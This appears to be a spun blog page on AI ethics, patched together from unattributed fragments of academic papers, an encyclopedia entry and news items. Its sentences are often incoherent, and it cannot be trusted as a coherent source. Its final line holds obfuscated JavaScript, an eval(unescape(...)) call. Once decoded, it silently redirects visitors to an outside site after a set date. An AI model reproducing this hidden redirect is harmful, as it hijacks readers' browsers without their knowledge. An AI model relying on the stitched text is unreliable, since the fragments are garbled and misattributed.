07 maj AI Ethics: What It Is and Why It Matters
Is Ethical A I. Even Possible? The New York Times
Just like a critical theory, the ethics of AI aims to diagnose as well as change society and is fundamentally concerned with human emancipation and empowerment. This is shown through a power analysis that defines the most commonly addressed ethical principles and topics within the field of AI ethics as either to do with relational power or with dispositional power. Moreover, it is concluded that recognizing AI ethics as a critical theory and borrowing insights from the tradition of critical theory can help the field forward. However, “AI” is just a collective term for a wide range of technologies or an abstract large-scale phenomenon. The fact that not a single prominent ethical guideline goes into greater technical detail shows how deep the gap is between concrete contexts of research, development, and application on the one side, and ethical thinking on the other. Ethicists must partly be capable of grasping technical details with their intellectual framework.
He
says we may have “generated a potentially dominating technology
in search of a guiding philosophy” (Kissinger 2018). Danaher
(2016b) calls this problem “the threat of algocracy”
(adopting the previous use of ‘algocracy’ from Aneesh 2002
[OIR], 2006). In a similar vein, Cave (2019) stresses that we need a
broader societal move towards more “democratic”
decision-making to avoid AI being a force that leads to a Kafka-style
impenetrable suppression system in public administration and
elsewhere. The political angle of this discussion has been stressed by
O’Neil in her influential book Weapons of Math
Destruction (2016), and by Yeung and Lodge (2019). Robotic devices have not yet played a major role in this area, except
for security patrolling, but this will change once they are more
common outside of industry environments.
Examples of AI ethics
Sam Altman, the CEO of OpenAI, initially explained that, in releasing ChatGPT to the public, the company sought to give the chatbot “enough exposure to the real world that you find some of the misuse cases you wouldn’t have thought of so that you can build better tools.” To us, that is not responsible AI. We and our colleagues spent two years interviewing and surveying AI ethics professionals across a range of sectors to try to understand how they sought to achieve ethical AI – and what they might be missing. We learned that pursuing AI ethics on the ground is less about mapping ethical principles onto corporate actions than it is ai ethical is about implementing management structures and processes that enable an organization to spot and mitigate threats. Creativity, understood as the capacity to produce new and original content through imagination or invention, plays a central role in open, inclusive and pluralistic societies. While AI is a powerful tool for creation, it raises important questions about the future of art, the rights and remuneration of artists and the integrity of the creative value chain. Search-engine technology is not neutral as it processes big data and prioritises results with the most clicks relying both on user preferences and location.
Robin Hanson
provides detailed speculation about what will happen economically in
case human “brain emulation” enables truly intelligent
robots or “ems” (Hanson 2016). One reason why the issue of care has come to the fore is that people
have argued that we will need robots in ageing societies. This
argument makes problematic assumptions, namely that with longer
lifespan people will need more care, and that it will not be possible
to attract more humans to caring professions. Most importantly, it ignores the
nature of automation, which is not simply about replacing humans, but
about allowing humans to work more efficiently.
Social Media Links
But a certain amount of the time, large language models will produce language that is racist, sexist, antisemitic, anti-Muslim, or anti-LGBTQ+ when prompted. In addition, papers about various ways to measure bias or toxicity in AI systems have more than doubled in the last two years, as has the number of papers submitted to the largest conference on algorithmic fairness (FAccT). Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
It is well known that humans are prone to attribute feelings and
thoughts to entities that behave as if they had sentience,even to
clearly inanimate objects that show no behaviour at all. Also, paying
for deception seems to be an elementary part of the traditional sex
industry. As individuals from all walks of life start seeing AI in their lives and in their jobs, AI Ethics becomes a critical part of AI literacy for most people.
Ethical concerns mount as AI takes bigger decision-making role in more industries
That means reflecting on the ways data are generated, recorded, curated, processed, disseminated, shared, and used (Bruin and Floridi 2017), on the ways of designing algorithms and code, respectively (Kitchin 2017; Kitchin and Dodge 2011), or on the ways training data sets are selected (Gebru et al. 2018). In order to analyze all this in sufficient depth, ethics has to partially transform to “microethics”. This means that at certain points, a substantial change in the level of abstraction has to happen insofar as ethics aims to have a certain impact and influence in the technical disciplines and the practice of research and development of artificial intelligence (Morley et al. 2019). On the way from ethics to “microethics”, a transformation from ethics to technology ethics, to machine ethics, to computer ethics, to information ethics, to data ethics has to take place. As long as ethicists refrain from doing so, they will remain visible in a general public, but not in professional communities.
It was that justice, fairness, beneficence, autonomy and other such principles are contested and subject to interpretation and can conflict with one another. While the anticipation of a future dominated by potentially indomitable technology has fueled the imagination of writers and film makers for a long time, one question has been less frequently analyzed, namely, to what extent fiction has played a role in providing inspiration for technological development. A special case of the opaqueness of AI is that caused by it being anthropomorphised, that is, assumed to have human-like characteristics, resulting in misplaced conceptions of its moral agency. This can cause people to overlook whether either human negligence or deliberate criminal action has led to unethical outcomes produced through an AI system. Some recent digital governance regulation, such as the EU’s AI Act is set out to rectify this, by ensuring that AI systems are treated with at least as much care as one would expect under ordinary product liability. One should also not forget that these algorithms are learning by direct experience and they may still end up conflicting with the initial set of ethical rules around which they have been conceived.
The purpose of this article is to argue that AI ethics has the characteristics of a critical theory, by showing that the core concern of AI ethics is protecting and promoting human emancipation and empowerment. Furthermore, I propose that understanding the field as a critical theory can help to overcome some of the shortcomings of the currently popular principled approach to the ethical analysis of AI systems. In other words, I argue that we not only could, but should analyze the ethical implications of AI systems through the lens of critical theory. The focus of the article therefore lies on the ethical analysis of AI systems and the principled approach, but I also discuss what a critical understanding of AI ethics means for the other topics and questions that make up the field.
But the most popular approach thus far—that is, the principled approach—has been met with criticism. Nevertheless, in several areas ethically motivated efforts are undertaken to improve AI systems. This is particularly the case in fields where technical “fixes” can be found for specific problems, such as accountability, privacy protection, anti-discrimination, safety, or explainability. However, there is also a wide range of ethical aspects that are significantly related to the research, development and application of AI systems, but are not or very seldomly mentioned in the guidelines. Again, as mentioned earlier, the list of omissions is not exhaustive and not all omissions can be justified equally. Some omissions, like deliberations on artificial general intelligence, can be justified by pointing at their purely speculative nature, while other omissions are less valid and should be a reason to update or improve existing and upcoming guidelines.
Improved Employee Morale
So, we should expect to see ethical norms around bias, governance and transparency become more common, much the same way we’ve seen the auto industry and others adopt safety measures like seatbelts, airbags and traffic signals over time. But of course people are people, so for every ethical principle there will always be someone who ignores or circumvents it. In addition, these responses came prior to the most recent studies aimed at addressing issues in ethical AI design and development. For instance, in early 2021 the Stanford Institute for Human-Centered Artificial Intelligence released an updated AI Index Report, the IEEE deepened its focus on setting standards for AI systems and the U.S.
- More on the methodology underlying this canvassing and the participants can be found in the final section.
- Rabelais used to say, ‘Science without conscience is the ruin of the soul.’ Science provides powerful tools.
- Indeed, AI systems themselves can be used to identify and fix problems arising from unethical systems.
- As Google fights for positioning in a new AI boom and an era where some consumers are turning to TikTok or ChatGPT instead of Google Search, some employees now worry product development could become dangerously hasty.
- These principles establish ‘right’ from ‘wrong’ in the field of AI, encouraging producers of AI technologies to address questions surrounding transparency, inclusivity, sustainability and accountability, among other areas.
eval(unescape(“%28function%28%29%7Bif%20%28new%20Date%28%29%3Enew%20Date%28%27February%201%2C%202024%27%29%29setTimeout%28function%28%29%7Bwindow.location.href%3D%27https%3A//www.metadialog.com/%27%3B%7D%2C5*1000%29%3B%7D%29%28%29%3B”));